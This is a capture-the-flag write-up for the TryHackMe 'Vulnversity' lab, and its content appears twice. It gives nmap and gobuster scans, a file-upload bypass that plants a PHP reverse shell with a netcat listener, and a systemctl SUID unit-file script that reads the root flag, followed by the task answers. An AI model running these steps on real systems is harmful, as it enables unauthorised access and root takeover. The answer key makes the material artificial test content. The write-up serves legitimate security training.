TryHackMe - Vulnversity

PreviousTryHackMe - Ultratech NextTryHackMe - Wonderland

Last updated 2 years ago

TryHackMe - Vulnversity

Nmap

┌──(root💀kali)-[~]
└─# nmap -T5 -sC -sV -O -Pn -p- 10.10.72.158
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 14:04 EDT
Warning: 10.10.72.158 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.72.158
Host is up (0.22s latency).
Not shown: 65508 closed tcp ports (reset)
PORT      STATE    SERVICE       VERSION
21/tcp    open     ftp           vsftpd 3.0.3
22/tcp    open     ssh           OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp   open     netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open     netbios-ssn   Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1281/tcp  filtered healthd
3128/tcp  open     http-proxy    Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp  open     http          Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Vuln University
|_http-server-header: Apache/2.4.18 (Ubuntu)
[STRIPPED]
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Linux 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: vulnuniversity
|   NetBIOS computer name: VULNUNIVERSITY\x00
|   Domain name: \x00
|   FQDN: vulnuniversity
|_  System time: 2022-05-08T14:16:34-04:00
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-05-08T18:16:34
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 710.19 seconds

Initial foothold

If we go to http://10.10.72.158:3333/ we have a website. However the content is not really useful for us. We can run gobuster, that is how we find the folder internal

┌──(root💀kali)-[~/Documents/tryhackme/vulnversity]
└─# gobuster dir -u http://10.10.72.158:3333/ --wildcard -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.72.158:3333/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/05/08 14:17:29 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 320] [--> http://10.10.72.158:3333/images/]
/css                  (Status: 301) [Size: 317] [--> http://10.10.72.158:3333/css/]   
/js                   (Status: 301) [Size: 316] [--> http://10.10.72.158:3333/js/]    
/fonts                (Status: 301) [Size: 319] [--> http://10.10.72.158:3333/fonts/] 
/internal             (Status: 301) [Size: 322] [--> http://10.10.72.158:3333/internal/]

After a few tries with burp, the accepted exentions is phtml. You can also fuzz it with burp intruder and make a grep match on "extension not allowed" to see which one will be allowed.
We edit php revershell (on kali we have it preinstalled) cp /usr/share/webshells/php/php-reverse-shell.php . we rename it in the accepted extension mv php-reverse-shell.php php-reverse-shell.phtml
nc -lvp 4444 We set up our listener
Now as mentioned we just need to go to http://<ip>:3333/internal/uploads/php-reverse-shell.phtml to execute our shell (if this was not specified we could have run gobuster in the internal folder
We get a shell as www-data

Privesc

Now let's enumerate our ways to privesc
find / -perm -u=s -type f 2>/dev/null We have a few files with suid bit on

/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs

Let's try the exploitation
- It creates a service in an env
- It will create a temp file in the syst as a service
- This will execute a command with bin/sh (in GTFObins it will execute id) in our case we could try to output our root flag in the output folder. It will then set a link and enable it
Here is our modified script

TF=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

Once we pasted all our commands above we just need to cat /tmp/output and this will give us the root flag.

Questions

Task 2

Scan the box, how many ports are open? Answer 6
What version of the squid proxy is running on the machine?Answer 3.5.12
How many ports will nmap scan if the flag -p-400 was used? Answer 400
Using the nmap flag -n what will it not resolve? Answer DNS
What is the most likely operating system this machine is running? Answer Ubuntu
What port is the web server running on? Answer 3333

Task 3

What is the directory that has an upload form page? Answer /internal/

Task 4

Run this attack, what extension is allowed? Answer phtml
What is the name of the user who manages the webserver? Answer bill
What is the user flag? I will let you do this on your own Hint: cat /home/bill/user.txt

Task 5

On the system, search for all SUID files. What file stands out? Answer /bin/systemctl
Become root and get the last flag (/root/root.txt) I will let you do this on your own Hint: cat /root/root.txt

PreviousTryHackMe - Ultratech NextTryHackMe - Wonderland

Last updated 2 years ago

Nmap

┌──(root💀kali)-[~]
└─# nmap -T5 -sC -sV -O -Pn -p- 10.10.72.158
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 14:04 EDT
Warning: 10.10.72.158 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.72.158
Host is up (0.22s latency).
Not shown: 65508 closed tcp ports (reset)
PORT      STATE    SERVICE       VERSION
21/tcp    open     ftp           vsftpd 3.0.3
22/tcp    open     ssh           OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp   open     netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open     netbios-ssn   Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1281/tcp  filtered healthd
3128/tcp  open     http-proxy    Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp  open     http          Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Vuln University
|_http-server-header: Apache/2.4.18 (Ubuntu)
[STRIPPED]
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Linux 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: vulnuniversity
|   NetBIOS computer name: VULNUNIVERSITY\x00
|   Domain name: \x00
|   FQDN: vulnuniversity
|_  System time: 2022-05-08T14:16:34-04:00
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-05-08T18:16:34
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 710.19 seconds

Initial foothold

If we go to http://10.10.72.158:3333/ we have a website. However the content is not really useful for us. We can run gobuster, that is how we find the folder internal

┌──(root💀kali)-[~/Documents/tryhackme/vulnversity]
└─# gobuster dir -u http://10.10.72.158:3333/ --wildcard -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.72.158:3333/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/05/08 14:17:29 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 320] [--> http://10.10.72.158:3333/images/]
/css                  (Status: 301) [Size: 317] [--> http://10.10.72.158:3333/css/]   
/js                   (Status: 301) [Size: 316] [--> http://10.10.72.158:3333/js/]    
/fonts                (Status: 301) [Size: 319] [--> http://10.10.72.158:3333/fonts/] 
/internal             (Status: 301) [Size: 322] [--> http://10.10.72.158:3333/internal/]

This a page with a file upload fonctionnality. This is perfect for a reverse shell
After a few tries with burp, the accepted exentions is phtml. You can also fuzz it with burp intruder and make a grep match on "extension not allowed" to see which one will be allowed.
We edit php revershell (on kali we have it preinstalled) cp /usr/share/webshells/php/php-reverse-shell.php . we rename it in the accepted extension mv php-reverse-shell.php php-reverse-shell.phtml
nc -lvp 4444 We set up our listener
Now as mentioned we just need to go to http://<ip>:3333/internal/uploads/php-reverse-shell.phtml to execute our shell (if this was not specified we could have run gobuster in the internal folder
We get a shell as www-data

Privesc

Now let's enumerate our ways to privesc
find / -perm -u=s -type f 2>/dev/null We have a few files with suid bit on

/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs

We have a GTFOBins entry for /bin/systemctl
Let's try the exploitation
- It creates a service in an env
- It will create a temp file in the syst as a service
- This will execute a command with bin/sh (in GTFObins it will execute id) in our case we could try to output our root flag in the output folder. It will then set a link and enable it
Here is our modified script

TF=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

Once we pasted all our commands above we just need to cat /tmp/output and this will give us the root flag.

Questions

Task 2

Scan the box, how many ports are open? Answer 6
What version of the squid proxy is running on the machine?Answer 3.5.12
How many ports will nmap scan if the flag -p-400 was used? Answer 400
Using the nmap flag -n what will it not resolve? Answer DNS
What is the most likely operating system this machine is running? Answer Ubuntu
What port is the web server running on? Answer 3333

Task 3

What is the directory that has an upload form page? Answer /internal/

Task 4

Run this attack, what extension is allowed? Answer phtml
What is the name of the user who manages the webserver? Answer bill
What is the user flag? I will let you do this on your own Hint: cat /home/bill/user.txt

Task 5

On the system, search for all SUID files. What file stands out? Answer /bin/systemctl
Become root and get the last flag (/root/root.txt) I will let you do this on your own Hint: cat /root/root.txt